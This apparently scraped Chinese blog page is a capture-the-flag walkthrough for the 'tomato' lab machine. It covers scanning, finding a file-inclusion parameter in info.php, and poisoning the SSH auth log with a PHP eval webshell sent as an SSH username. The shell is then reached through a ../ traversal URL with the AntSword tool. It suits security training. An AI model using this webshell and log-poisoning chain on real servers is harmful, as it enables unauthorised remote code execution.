当前位置: 首页 > news >正文

tomato靶机通关攻略

news 2025/7/29 20:44:05

1、扫描靶机端口

2、访问开放的端口,当访问8888是,出现登录界面

3、扫面靶机目录

dirb http://172.16.1.113

4、访问http://172.16.1.113/antibot_image/

5、点击antibots文件夹,可以发现许多文件

再点击info.php

查看页面源代码,可以发现参数为image

6、查看日志文件

7、使用ssh 连接,写入一句话木马

ssh '<?php phpinfo();eval($_POST["cmd"]);?>'@172.16.1.113 -p 2211

8、使用蚁剑进行连接

http://172.16.1.113/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log


http://www.mrgr.cn/news/19552.html

相关文章:

  • 基于 AT 固件测试 ESP32 设备作为 WiFi AP 模式创建 TCP Server 开启 UART-to-WiFi 透传模式的指令序列
  • 公司网站设计方案
  • python中.之后的圈c、圈v分别代表什么意思?
  • Chrome 浏览器插件获取网页 window 对象(方案二)
  • Mysql数据量大,如何拆分Mysql数据库(水平拆分)
  • 【精选】高校餐厅校园送餐系统的开发与实现(全网最新,独一无二,阿龙定制(高校毕业生系统,大学生就业信息系统吗,就业系统,JAVA系统,就业系统,信息管理系统)
  • 字节4面通过,我可以跟面试官要30K吗?
  • 一文解析新手玩转TikTok只需TK引流系统
  • 利用javacv实现视频转h264
  • GIS十大经典问题之1.缓冲区分析问题
  • 构建数据安全防线:MySQL数据备份的软件要求与实践
  • 程序员学Python编程规范(简单明了!)
  • 记一次公有云遇到的bug(随手记)
  • C++:红黑树的深度剖析和模拟
  • 09-03 周二 ansible部署与使用指南
  • spring源码之ConfigurationClassPostProcessor解析配置类
  • 基于FPGA实现SD NAND FLASH的SPI协议读写
  • Ansys Workbench如何导出某个面的节点及坐标
  • vue-awesome-swiper 问题
  • 2024运维监控工具的普及得益于几个关键因素